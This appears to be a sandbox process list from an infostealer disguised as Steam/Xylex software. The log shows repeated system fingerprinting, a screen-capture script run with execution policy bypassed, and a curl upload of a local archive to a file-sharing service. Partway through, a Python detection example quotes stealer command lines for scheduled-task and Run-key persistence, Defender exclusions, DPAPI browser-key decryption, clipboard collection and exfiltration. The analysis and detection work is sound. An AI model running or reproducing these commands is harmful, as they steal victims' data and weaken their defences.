powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Pogmxnrt.zip";"

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\curl.exe

curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Pogmxnrt.zip";
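Between the DPAPI calls and this upload, the process list shows the whole chain a detection engineer needs to cover: a scheduled task running a ProgramData script as SYSTEM every 10 minutes, a Run key and a Startup-folder drop both named after Steam, two Defender path exclusions, a hidden clipboard collector, an external IP lookup, and a multipart POST of a local archive to a file-sharing service, all interleaved with a tight wmic/ipify polling loop that repeats every few seconds. The following is an added detection example, not part of the sandbox output: a small rule set evaluated over command lines copied from this report (the DPAPI byte array cut to its first bytes), each tagged with the ATT&CK Enterprise technique it maps to. Rule wording, technique choices and the dedupe logic are this example's own.

```python
"""Command-line triage over the process list in this report.

Added detection example; it is not part of the sandbox output. Each rule is a
set of substrings that must all occur (case-insensitively) in a single process
command line, tagged with the ATT&CK Enterprise technique the behaviour maps to.
SAMPLE_CMDLINES are copied from the process list above, except that the DPAPI
byte array is cut to its first bytes; rule names, technique choices and the
matching logic are this example's own.
"""
from collections import defaultdict

# (technique id, what the rule catches, substrings that must all be present)
RULES = [
    ("T1053.005", "schtasks task created as SYSTEM to run a script out of ProgramData",
     ("schtasks", "/create", "/ru system", "programdata")),
    ("T1547.001", "Run key value pointing into the user's Temp directory",
     ("reg add", r"\currentversion\run", r"\appdata\local\temp")),
    ("T1547.001", "executable downloaded straight into the Startup folder",
     ("curl -o", r"\start menu\programs\startup")),
    ("T1562.001", "Defender path exclusion added with Add-MpPreference",
     ("add-mppreference", "-exclusionpath")),
    ("T1555.003", "DPAPI Unprotect of an inline byte array (browser key theft)",
     ("protecteddata]::unprotect", "[byte[]]")),
    ("T1115", "hidden PowerShell clipboard collector",
     ("-windowstyle hidden", "get-clipboard")),
    ("T1567.002", "multipart POST of a local archive to a file-sharing service",
     ("curl", "--request post", "--form", "file=@")),
    ("T1016.001", "external IP lookup via api.ipify.org",
     ("curl", "api.ipify.org")),
]

# Copied from the report's process list; the last two are benign-looking noise.
SAMPLE_CMDLINES = [
    r'schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM',
    r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe" /f',
    r'powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"',
    # DPAPI blob cut to its first bytes for this example
    r"powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223), $null, 'CurrentUser')",
    r'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"',
    r'curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Pogmxnrt.zip";',
    r'curl http://api.ipify.org/ --ssl-no-revoke',
    r'curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE',
    r'wmic bios get smbiosbiosversion',
    r'tasklist',
]


def match_line(cmdline: str) -> list:
    """Technique ids of every rule whose substrings all occur in cmdline, in rule order."""
    low = cmdline.lower()
    return [tid for tid, _what, needles in RULES if all(n in low for n in needles)]


def triage(cmdlines) -> dict:
    """Map technique id -> indices of the first occurrence of each distinct matching
    command line. Exact repeats (the report's wmic/ipify polling loop) are skipped so
    the noise does not inflate the counts."""
    hits, seen = defaultdict(list), set()
    for i, line in enumerate(cmdlines):
        key = line.strip().lower()
        if key in seen:
            continue
        seen.add(key)
        for tid in match_line(line):
            hits[tid].append(i)
    return dict(hits)


if __name__ == "__main__":
    for tid, idx in sorted(triage(SAMPLE_CMDLINES).items()):
        what = next(w for t, w, _ in RULES if t == tid)
        print("%-10s lines %-8s %s" % (tid, idx, what))
```

The ipify rule on its own is low-value (plenty of legitimate software asks for its public IP), which is why the output is keyed by technique rather than by hit count: the alert condition worth writing is a single process tree that covers persistence, defence evasion and exfiltration together, as this one does, not any one line. On a live host the same substrings apply to Sysmon Event ID 1 CommandLine fields or to PowerShell script-block logs.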

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Executor\Xylex.bat

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\deps\extract.js

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\lib\sqlite3.js

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe

"C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5kpjkbri\5kpjkbri.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

